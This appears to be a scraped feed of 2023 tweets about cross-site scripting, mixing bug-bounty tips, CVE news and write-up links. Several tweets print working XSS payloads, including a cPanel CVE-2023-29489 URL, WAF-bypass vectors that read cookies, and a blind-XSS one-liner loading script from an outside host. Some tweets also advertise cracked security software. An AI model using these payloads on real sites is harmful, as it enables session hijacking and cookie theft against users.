@DexSec0xa year agoTry to get some bounty! CVE: CVE-2023-29489 Vulnerability : 0 Day cPanel XSS Payload: cpanelwebcall/<img%20src=x%20onerror="prompt(1515)">aaaaaaaa #0day #xss #vulnerability #cpanel #BugBounty https://t.co/2BFEHb7IyO
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoWhy doesn't this XSS attack work? - Visit https://t.co/ukZU77nQMz for the answer. #xss #dom #infosec #softwareengineering #software
![profile](https://pbs.twimg.com/profile_images/1620375171885301760/br4IgPWj_normal.jpg)
0xJay
@0SPwna year ago"><a href=jav&#x0D;ascript&colon;top[8680439..toString(30)](document.domain)>Click</a> - LiteSpeed (ModSecurity) WAF Bypass. #waf #bugbountytips #BugBounty #hacking #xss
![profile](https://pbs.twimg.com/profile_images/1651861455912808448/1kbR3Dp6_normal.jpg)
404xNotFound
@htp_onlinea year agoWorking on a way to exploit XSS & Hijack a session for future testing. I would technically just add my IP address there and create a listener, then if the XSS on the test site executes and steals a cookie I can jack their sesh in theory.. #Cybersecurity #BugHunting #Infosec https://t.co/3k0C39YHCC
![profile](https://pbs.twimg.com/profile_images/1554022844899532800/eTA6AA2I_normal.jpg)
Kunj Patel
@Legacy_Defendera year ago#bugbounty #bugbountytips #xss #securitybreach Credit: Cyber Security Researcher and Bug Hunter. Kunj Patel aka (Legacy_Defender) https://t.co/fWuwaTRhzi……… https://t.co/YSbrd6iLQY https://t.co/JnTzxYNwmv
![profile](https://pbs.twimg.com/profile_images/1423328835630600197/Yq6hnEe5_normal.jpg)
Kinnaird McQuade 💻☁️💥
@kmcquade3a year agoIt’s not every day you get to meet your heroes in #infosec I got to meet @jeremiahg at @RSAConference! He’s one of the OGs in AppSec and the founder at White Hat. Back in college, I read his book on XSS and all his blogs. And we finally got to meet! See you back in Maui 🤙🏼 https://t.co/rahu3leND8
![profile](https://pbs.twimg.com/profile_images/1634754471040548866/q8luDRF6_normal.jpg)
7h3h4ckv157
@7h3h4ckv157a year agoMastering Payloads for Web Application Security: XSS, LFI, RCE, and SQL Injection 📍 https://t.co/xK86nN5a0e #infosecurity #CyberSec #bug #coding #BugBounty #infosec #bugbountytip #bugbountytips #pwn #ctf #CyberSecurityAwareness #cybersecuritytips #Hacking #redteam #Pentesting… https://t.co/JiLsgFSeZZ
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoCisco pinpoints an XSS vulnerability affecting Prime Collaboration #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1358854458470326272/1_z5EYW7_normal.jpg)
pwnmachine
@princechaddhaa year ago[CVE-2023-20864] cPanel - Cross-Site Scripting Nuclei Template: https://t.co/RpJcSKt28A Reference: https://t.co/gwy9udIiZn #CVE #cpanel #NucleiTemplates #bugbounty @pdnuclei https://t.co/SrRCFLhgay
![profile](https://pbs.twimg.com/profile_images/1272177873864933376/s3p8z6rf_normal.jpg)
Siva krishna
@le4rnera year ago@infosec_au @assetnote I am surprised by the POC it is and a basic XSS probe could have picked this up as reflection, but never found it, I agree now that cpanel might be vulnerable to many more bugs https://t.co/V0QAJxQGL4<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoCisco Zero-Day Flaw: Let Remote Attackers Launch XSS Attacks #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1529808778111107076/lB4saX7z_normal.jpg)
Bar Hofesh @[email protected]
@bararchya year agoNice #bugbountytips which you can also see on https://t.co/BcNXq5gEF2 (@brokencrystalss) You can get an XSS even if the response is XML by using the relevant payload: <x:script xmlns:x="https://t.co/TglNoErgHR">alert(1)</x:script> Go try it out: https://t.co/WTAsukAAy8
![profile](https://pbs.twimg.com/profile_images/1633202137650847744/PKyaSLHx_normal.jpg)
ReconOne
@ReconOne_bka year ago[Oh noo] Reflected XSS in cPanel - tracked as CVE-2023-29489 🔥 If you have cPanel servers in your asset list, check them out 👇 #recon #AttackSurface #bugbounty #recontools #recontips #xss #cPanel https://t.co/dJnTqn8zZ3
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoXSS: Parsing Javascript - Visit https://t.co/Ph2mGJcnI4 for the solution. #javascript #xss #infosec #softwareengineering #100daysofcode
![profile](https://pbs.twimg.com/profile_images/1405882362072768519/6ADt8ReD_normal.jpg)
Simba Tech Tv
@simrotion13a year agoCPanel Reflected XSS payload for #CVE-2023-29489 POC https://t.co/QovlMufd9Y #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1607956749226774529/kH3-SwwC_normal.jpg)
zaen.hxr
@zaenhaxora year agoXss #hacking https://t.co/hhRADmIHOK
![profile](https://pbs.twimg.com/profile_images/1384538705797554177/o0BURm0O_normal.png)
Black Hat Ethical Hacking
@secur1ty1samytha year agoCisco Discloses Zero-Day #XSS Vulnerability in Prime Collaboration Deployment Software #Cisco Zero-Day #Vulnerability in Prime Collaboration Deployment Software Discovered, Could Lead to XSS Attacks Post: https://t.co/elBPtQsmBf #zeroday #exploit #hacking #infosec https://t.co/RyA1svSmrO
![profile](https://pbs.twimg.com/profile_images/1274957081112711168/N_tfeC57_normal.jpg)
Simon Zerafa 🖖 (@[email protected])
@SimonZerafaa year ago@SGgrc Oh cool cPanel; not like that's everywhere 🫤🤦♂️ https://t.co/IAN96d4mD3 https://t.co/OCbK8D6Gi4
![profile](https://pbs.twimg.com/profile_images/419147954344058880/bTW9Gx7T_normal.png)
Gray Hats
@the_yellow_falla year agoCVE-2023-29489: XSS Vulnerability in cPanel Threatening 1.4 Million Websites https://t.co/FU6E1GzeCs #opensource #infosec #security #pentesting
![profile](https://pbs.twimg.com/profile_images/1448503614188761091/Bo7HBtiG_normal.jpg)
SAFE 😵💫
@0x21SAFEa year agoCPanel 0day Reflected XSS payload for CVE-2023-29489 htt.p://example.com/cpanelwebcall/%3Cimg%20src%3Dx%20onerror%3D%22prompt%281%29%22%3Eaaaaaaaaaaaa #0day #xss #bugbountytips
![profile](https://pbs.twimg.com/profile_images/3358949069/c09a65ba5749ebf32639f5862db4b273_normal.jpeg)
Allaboutclait
@allaboutclaita year agoCisco discloses XSS zero-day flaw in server management tool https://t.co/NcNR6oUiLt #infosec #Cisco
![profile](https://pbs.twimg.com/profile_images/1418144429320384514/zcb_u3tV_normal.jpg)
Xc0re Security
@Xc0resecuritya year agoCisco discloses XSS zero-day flaw in server management tool https://t.co/Uv1sO2Vzcb #cybersecuritynews #netsec #infosec https://t.co/IdEjlmKuT5
![profile](https://pbs.twimg.com/profile_images/1078619152636624897/MxZXcy8p_normal.jpg)
Cyber Secure New York
@cybersecurenya year agoBleepinComputer: Cisco discloses XSS zero-day flaw in server management tool - @serghei https://t.co/DONHT2cLKp https://t.co/19pHCTsz2Q #cybersecurity #hacking #computersecurity #nyc #newyork
![profile](https://pbs.twimg.com/profile_images/1432505620540706820/lv6DtM7I_normal.png)
TheWhiteCircle
@twc1rclea year agohttps://t.co/jFvl4TS5FR #infosec #tools #vapt #hacking #cyberattack #informationsecurity #cybersecurity #cve #opensource #vulnerability #exploit #ethicalhacking #twc #programming #thewhitecircle
![profile](https://pbs.twimg.com/profile_images/1579211588359229442/UKkCk6FI_normal.jpg)
Cyberfeed.io
@cyberfeedioa year agoCisco discloses XSS zero-day flaw in server management tool https://t.co/9qfN2oFnQN #cybersec #security #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1516186231083876352/ahW_7jzj_normal.jpg)
Thee Eclipse
@Thee_Eclipsea year agoYay, I was awarded a $$$ bounty on @Hacker0x01! 🎩 Issue: Stored XSS via SVG https://t.co/YkRMxxn9K9 #TogetherWeHitHarder #bugbounty #hacking
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/t3IjCJbKqC
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoDo WebGoat style XSS attacks still work? - Visit https://t.co/pId6Qv2TS7 for the answer. #web_application #webgoat #infosec #code #software
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCommodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT - https://t.co/Be95yi7ftb #bugbountytips #cybersec #infosec
![profile](https://pbs.twimg.com/profile_images/1640678630945878017/H5Zaf_vB_normal.jpg)
X3NUX
@hidayatcodea year agoAwesomeXSS This repository is a collection of Awesome XSS resources. Contributions are welcome and should be submitted via an issue. https://t.co/IA0E9zpdcx #infosec #pentesting #bugbounty
![profile](https://pbs.twimg.com/profile_images/1628814157297467394/zbs7FY-5_normal.jpg)
Skidrow/ياسر
@firfox20a year agoXSS Reflected Alert Using my iphone 😂 #BugBounty https://t.co/Zwc3ifMyCO
![profile](https://pbs.twimg.com/profile_images/1276069838868414466/zdQG4aPl_normal.jpg)
moSec
@moe1n1a year agoWapalayzer: it is angular with version x.y.z Me:👀 ➡️portswigger xss cheat sheet Boom: Waf blocked my payload😁 Me: there's other subdomains with same stack🤓 Mission success 💯 #bugbountytips https://t.co/vnqxp2xnp0
![profile](https://pbs.twimg.com/profile_images/1232543850461368320/0HD_1RjH_normal.jpg)
Dr.FarFar
@3XS0a year ago#FREE 2ಠ23 ♥ Invicti Professional Edition 23.4.0.40376 Full Activated – Discount 100% https://t.co/Joixus9aMb Link: https://t.co/gBrFhDHKls #HackerOne #infosec #Synack #bugcrowd #bugbountytips #bugbountytip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #XSS #BugHunter https://t.co/KcqVOX0lGA
![profile](https://pbs.twimg.com/profile_images/1638086490629586945/0XoF8_cS_normal.jpg)
Tarek
@DeanOfCybera year agoHere are my top 10 ways to make $10k #BugBounty in 10mins 🧵👇 Just kidding. If you're into bb read this. As a self identifying old-timer, I can confirm that after a number of years, finding your 100th XSS loses its glamor https://t.co/lu2xjvbjIm
![profile](https://pbs.twimg.com/profile_images/1618236159120871425/WV8sws8U_normal.jpg)
حسین گلزاری
@Hossein_golzaria year agoبچه ها رایتاپ های ارمان رو حتما بخونید دیشب با اخرین رایتاپش یه XSS تو یکی از پروگرام های هکروان زدم @M7arm4n https://t.co/CgGOvpCrNV
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoJSP ContextPath Link Manipulation http://target/&sol;EvilDomain/xss.js&num;/..;/..;/contextPathExample/test.jsp #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1570858647449899008/Hryn4TYZ_normal.jpg)
Rounak Premchandani
@RDX131106a year ago@TCMSecurity Is it necessary to first learn or the vulnerabilities to get into web app hacking and bug bounty ? Or is it possible to just start with one, for example XSS, and then try it on VDPs then get into perfecting it and then after all move to another ? Like SQL injection?
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoStored DOM XSS https://t.co/q3XVtc8c3l #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoiOS Bug Hunting – Web View XSS – https://t.co/TL7LrxK5ZM https://t.co/s3oKPMsX72 #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1644078299948150786/Zeo9g58m_normal.jpg)
Spear Bug Bounty
@spearbugbountya year ago$600 Cross Site Scripting (XSS) PoC https://t.co/q0YQhvsFUa #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1644078299948150786/Zeo9g58m_normal.jpg)
Spear Bug Bounty
@spearbugbountya year ago$150 Cross Site Scripting (XSS) PoC https://t.co/XP7vbbcqvB #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1176895564799082496/TKaVj6Hh_normal.jpg)
Stealthy
@stealthybugsa year agoInteresting XSS with random tag and zero special characters. <java contentEditable='' autofocus='' onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1) #xss #bugbounty #bugbountytips #hackerone #infosec #xsspayloads #hacking #ethicalhacking #infosec #whitehat
![profile](https://pbs.twimg.com/profile_images/1530252811270860805/InfTRtf-_normal.jpg)
Batuhan Aydın
@Telumaka year agoYou can read my article📝 titled 🧐 "XSS Understanding the Nature" where I talk about the nature of XSS and the ways to research them. Happy reading everyone. 😊 #creativity #technology #python #cybersecurity #security #xss #bugbounty #DEVCommunity https://t.co/SUCpDGCdH6
![profile](https://pbs.twimg.com/profile_images/1615460883324362752/G_qA5Whs_normal.jpg)
Greed
@0xGreed_a year agoManaged to bypass Cloudflare protection to trigger an XSS on a target using such a payload <svg/on/onload=alert(document.domain)> It was inspired by @aufzayed and found here https://t.co/9CYvEP8lnZ #bugbountytips #bugbounty #intigriti
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoStored DOM XSS by: 45w1nkv https://t.co/HvpvjJN50R #bugbounty #WriteUps
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year agohack_git has lots of XSS Vectors/Payloads 🕵️♂️🔎 from resources like websites, tweets & books 📚 to bypass WAF & find XSS vulnerabilities 👩💻👨💻. Check out the list & stay updated for new ones 🗃️🔄 #XSS #Hacking #WAF #Vulnerability #CyberSecurity
![profile](https://pbs.twimg.com/profile_images/1301206555338051584/nUAnAMr9_normal.jpg)
Hacking Articles
@hackinarticlesa year agoBurp Suite for Pentester: XSS Validator https://t.co/wPEbBctC9O #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty… https://t.co/qTBWJ5KE4d https://t.co/AzgoDMnsge
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs this code vulnerable to Reflected XSS? - Visit https://t.co/fGh38pqS7B for the answer. #xss #reflected_xss #infosec #code #softwaredevelopment
![profile](https://pbs.twimg.com/profile_images/1516519684685934600/V_n-TLei_normal.png)
HUNTER 🇺🇦
@SaFiSecua year agoI just published How I Earned $1000 in Just 5 Minutes On Medium & Youtube Check it Out https://t.co/WWrisblNyU https://t.co/6mHl58m56N #xss #googlexss #xssbypass #storedxss #Hacking #CyberAttack #Pentesting #Hacked
![profile](https://pbs.twimg.com/profile_images/1589979416616005637/Yw2WPaLQ_normal.jpg)
pranav
@zerodaywo1fa year agoLevel up your #pentesting & streamline your life, #BugBounty hunters 🎯: 🔸Burp Suite > Proxy > Settings 🔸Match & Replace > Add Match: xss1 Replace: <script>alert(document.cookie)</script> Comment: XSS 1 Type 'xss1' & let #Burp swap it with your JS payload! 🚀 #bugbountytips https://t.co/q4vFU1t62E
![profile](https://pbs.twimg.com/profile_images/1632087158000328704/67BqxJNn_normal.jpg)
Masaud Ahmad
@masaudseca year ago#BXSS subfinder -d https://t.co/ndhz4PcZUc | gau | grep "&" | bxss -appendMode -payload '"><script src=https://t.co/Hiuf81Ha6G></script>' -parameters #cybersecuritytips #bugbountytips #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1644078299948150786/Zeo9g58m_normal.jpg)
Spear Bug Bounty
@spearbugbountya year agoXSSpear v1.0 a powerful single target URL rXSS scanner try it now! http://18.209.60.172:8080/ #hackwithautomation #cybersecurity #crawler #bugbounty #infosec #bugbountytips #hacking #ChatGPT #xss #sqli #sqlinjection #pentesting #CTF #recon #hackerone #bugcrowd #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1516519684685934600/V_n-TLei_normal.png)
HUNTER 🇺🇦
@SaFiSecua year agohttps://t.co/LTlnfMkPvl #xss #idor #rce #BugBounty #hacker #Reconquete #payload @SimplyBookMe #bugbountystealer
![profile](https://pbs.twimg.com/profile_images/1548889702572429314/9fWrKfah_normal.jpg)
Kali Nathalie 🏳️⚧️
@K4L1_FSa year ago[Infosec] Finalmente meu deus do ceu, meu primeiro XSS(por sinal, storage) numa aplicação real(non CTF) com uma WAF insuportável. 😭🎉😭🎉😭🎉😭🎉 Bypass da WAF com tag HTML5 https://t.co/NFDhqxWphq
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxseca year ago8 Linux distros have released advisories for high-severity kernel bugs, including an actively exploited use after free vuln🪲‼️ Learn how to secure against these flaws that could lead to crashes, the exposure of sensitive info & more👇 https://t.co/HIQgE2IDQi #linux #infosec
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoBugCrowd Bug Bounty Disclosure: - Clickjacking with reflected xss and redirected to google - By Orange_hacker - https://t.co/U1evawvwOS #BugCrowd #BugBounty #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1490160598449012745/wqOKJQQE_normal.jpg)
Avoid The Hack!
@avoidthehacka year agoCISA Adds One Known Exploited #Vulnerability to Catalog CVE-2022-27926 - Zimbra Collaboration (ZCS) XSS Resolution is to... update! #exploits #cybersecurity #infosec #security https://t.co/DwqrucRP7A
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoBlind XSS via SMS Support Chat — $1100 Bug Bounty! https://t.co/boZE958dZx #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1467327353277739009/tQXjVxuA_normal.jpg)
ASWIN K V
@deep_marketer_a year agoCan you trigger the xss? #bugbountytips #bugbountytip #BugBounty #infosec #CTF #Vulnerability #Hacking #DOMXSS #cybersecuritytips #xss #DOGE @theXSSrat @XssHunter https://t.co/BOTud10xNU
![profile](https://pbs.twimg.com/profile_images/1286430390220140548/vBKoN9WV_normal.jpg)
khadir Ha
@Nihilisme10a year agoXSS without HTML: Client-Side Template Injection with AngularJS https://t.co/gEsLFRo7Ua #BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #Hacked — Ninad Mishra (@NinadMishra5) Apr 3, 2023 XSS without HTML: Client-Side Template Injection with AngularJS …
![profile](https://pbs.twimg.com/profile_images/1627307157371686912/OKDwF0gl_normal.jpg)
Abdelrhman Allam
@sl4x0a year agoRXSS via CVE-2021-20323 Template: https://t.co/M6al3Bm3dS #bugbounty #xss https://t.co/vYUQ8qmgcS
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs converting `<` to `&lt;` sufficient to prevent execution of JavaScript from arbitrary HTML? - Visit https://t.co/kxrX3AaGyd for the answer. #xss #javascript #html #infosec #devlife
![profile](https://pbs.twimg.com/profile_images/1605805562704248832/SSwYApf2_normal.png)
Briskinfosec Technology and Consulting Pvt Ltd
@briskinfoseca year agoIs your #WordPress site using the #Lightspeed caching #plugin? Be aware of #security #vulnerabilities such as #XSS, #SQL injection, and privilege escalation that could compromise your #website's security. 🔗https://t.co/jGBOGHdqmI #dataprotection #DataBreach #websecurity #infosec https://t.co/pmFwTEnfCV
![profile](https://pbs.twimg.com/profile_images/1521731885742895104/O98spZI4_normal.jpg)
Alnoor Faisal
@tashwish01a year agoBlind Xss 🔥 https://t.co/FIZihWtuZf #hackerone #bugbounty #infsec #blind #xss https://t.co/nohzG9JSF9
![profile](https://pbs.twimg.com/profile_images/1388167436843819008/t2bYbDXU_normal.jpg)
adametim
@hacking4every1a year agoDay 22 of #100DaysOfHacking -revised some of my already obtained IT knowledge (XSS + LFI) -completed 5 tasks of AEC Hacking Competition 2023
![profile](https://pbs.twimg.com/profile_images/1104043057270403072/uC45Dbad_normal.png)
PenTest Magazine
@PenTestMaga year agoAppSec Tales XII! Read here: https://t.co/Nr2infVtbi #pentest #pentesting #magazine #pentestmag #cybersecurity #Infosec #owasp #redteam
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoBlind XSS via SMS Support Chat — $1100 Bug Bounty! by: no.pl4c3.l1k3.127.0.0.1 https://t.co/HJcRTlqvX1 #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/TJw82KiDcb
![profile](https://pbs.twimg.com/profile_images/1634508098777018369/dGTtonKL_normal.jpg)
InfoSafeHub
@InfoSafeHuba year agoHello! I just wrote an article about automating XSS vulnerability hunting for mass cross-site scripting. You can check it out at:- https://t.co/GG8TwvPJBZ #bugbountytips #cybersecurity #hacking #ethicalhacking #websecurity
![profile](https://pbs.twimg.com/profile_images/1632087158000328704/67BqxJNn_normal.jpg)
Masaud Ahmad
@masaudseca year agoHello! I just wrote an article about automating XSS vulnerability hunting for mass cross-site scripting. You can check it out at https://t.co/xrcuSaiv3J #bugbountytips #cybersecurity #hacking #ethicalhacking #websecurity https://t.co/KNuEdpwW99
![profile](https://pbs.twimg.com/profile_images/1633705506077388802/LJxK90i0_normal.jpg)
Fat
@fattselimia year agoAnother one today this was for a Blind XSS and its a 7 months old report ^_^ #bugbounty #ethicalhacking #togetherwehitharder https://t.co/4QQ2Pvzj14
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs it possible to exploit unescaped user input into JavaScript form which only gets data via AJAX request? - Visit https://t.co/tHFv0xFnSO for the answer. #xss #infosec #software #softwareengineering #code
![profile](https://pbs.twimg.com/profile_images/1549096440038924289/S3YPC2Em_normal.jpg)
Chevon Phillip
@ChevonPhillipa year agoI just published Blind XSS via SMS Support Chat — $1100 Bug Bounty! https://t.co/cFlJrCHurg #bugbountytip #bugbounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1634508098777018369/dGTtonKL_normal.jpg)
InfoSafeHub
@InfoSafeHuba year agoFrom Basic to Advanced: A Guide to Bug Bounty Hunting Automation Techniques:- Checkout thread 👇 #bugbounty #bugbountytips #cybersecurity #ethicalhacking #vulnerability #websecurity #pentesting #automation #xss #oscommandinjection #subdomainenumeration #fuzzing #nuclei https://t.co/1UhW20pJ47
![profile](https://pbs.twimg.com/profile_images/1564569442218135555/bSfjKN58_normal.jpg)
Ninad Mishra
@NinadMishra5a year agoXSS without HTML: Client-Side Template Injection with AngularJS https://t.co/sn45owMicz #BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #Hacked
![profile](https://pbs.twimg.com/profile_images/1562167843788955649/WI1u3Re5_normal.jpg)
Deepak Choudhary
@CipherEraa year agoFile Upload Testing ( Method 5 ) => #WayToInject => Unrestricted File Upload Leads To Stored XSS. Poc: https://t.co/MLo6KAAm8y #CipherEra #VadixEra #AlphaEra #bugbounty #bugbountytips #offensivesecurity #webtesting #pentesting #fileupload #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoUploading images safe of XSS, php code and virus - Visit https://t.co/UIAX2l3qW8 for the solution. #php #xss #virus #file_upload #infosec
![profile](https://pbs.twimg.com/profile_images/1598478341471965186/FdWwRc5u_normal.jpg)
ravirajiq
@Ravirajiqa year agoI have found a xss bug 🤑. #BugBounty https://t.co/av0paJpiqW
![profile](https://pbs.twimg.com/profile_images/1632087158000328704/67BqxJNn_normal.jpg)
Masaud Ahmad
@masaudseca year agoFrom Basic to Advanced: A Guide to Bug Bounty Hunting Automation Techniques LINK : https://t.co/vqZR1RIG3H #bugbounty #bugbountytips #cybersecurity #ethicalhacking #vulnerability #websecurity #hackingtools #pentesting #automation #xss #oscommandinjection #subdomainenumeration https://t.co/sUokHuD8wz
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoExploiting Markdown Syntax and Telescope Persistent XSS through Markdown (CVE-2014-5144) https://t.co/mTYbqNLzqG #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoCache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover) https://t.co/09PLZSTp6h #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1595902455677583360/7FXgxSwh_normal.jpg)
Cybersecurity Tooling Bot
@infosec_intela year agoGithub: https://t.co/u3iCLyraBb Stars: 855 Watching: 44 Last change: Apr 2, 2023 #infosec #redteam #pentesting #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1634259331003871233/l8MA2XPr_normal.jpg)
Saitle OP
@SaitleOa year agoDuck JS payload, kill js with your new xss power😉 https://t.co/h2wgbmTXiV #bugbountytips #wapt #Pentesting
![profile](https://pbs.twimg.com/profile_images/1642726840862408705/M81kFfQa_normal.jpg)
flyseccorp
@flysec_corpa year agoOur cases for bypass WAF (Imperva) - autofocus/onfocus=any() --> onfocus=;var{cookie}=document;write(cookie) - autofocus/onfocus - onfocus=any() --> onfocus=;write(cookie) - onfocus=any() --> onfocus=;Function(`ale`+`rt(domain)`)() #BypassWAF #XSS #Imperva #bugbounty https://t.co/qzin4p4Igx
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1760): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/w0FpZEJcPq Disclosed by https://t.co/6upkXZrCCJ, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1759): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/ixEya8G9Ed Disclosed by https://t.co/PLCH1wNNXA, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1755): Cross-site Scripting (XSS) - Generic in thorsten/phpmyfaq. https://t.co/Rga9tnABOP Disclosed by https://t.co/6upkXZrCCJ, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1605882772287115264/_8lYQAAy_normal.jpg)
Hossein
@ho3ein_33a year ago@bughuntar @SaveToNotion #Thread #XSS #BugBounty
![profile](https://pbs.twimg.com/profile_images/1641429424640872449/n1H3FcaI_normal.jpg)
Hackers News
@HackersNews247a year agoThe Vulkan papers. 3CXDesktopApp incident. XSS flaw can lead to remote code execution. AlienFox targets misconfigured servers.. Hackers News https://t.co/VStfzexoIU #Hacking #Hacked#HackersNews #hacker #Hackingtime #Anonymous #hacktheplanet #news #newsUpdate #NewsUpdates
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@3XS0: #FREE 2ಠ23 ♥ HCL AppScan Standard v10.2.0.28254 Full Activated - CyberSecurity - Discount 100% https://t.co/BkoA2rOHgO Link : https://t.co/W3WEHRzxxD #HackerOne #inFoSec #bugbountytips #Log4j #BugBountyTip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #XSS #Log4j…
![profile](https://pbs.twimg.com/profile_images/1232543850461368320/0HD_1RjH_normal.jpg)
Dr.FarFar
@3XS0a year ago#FREE 2ಠ23 ♥ HCL AppScan Standard v10.2.0.28254 Full Activated - CyberSecurity - Discount 100% https://t.co/Joixus9aMb Link : https://t.co/IDF7EDWn0q #HackerOne #inFoSec #bugbountytips #Log4j #BugBountyTip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #XSS #Log4j2 #Hacker https://t.co/knzlo6vHUM
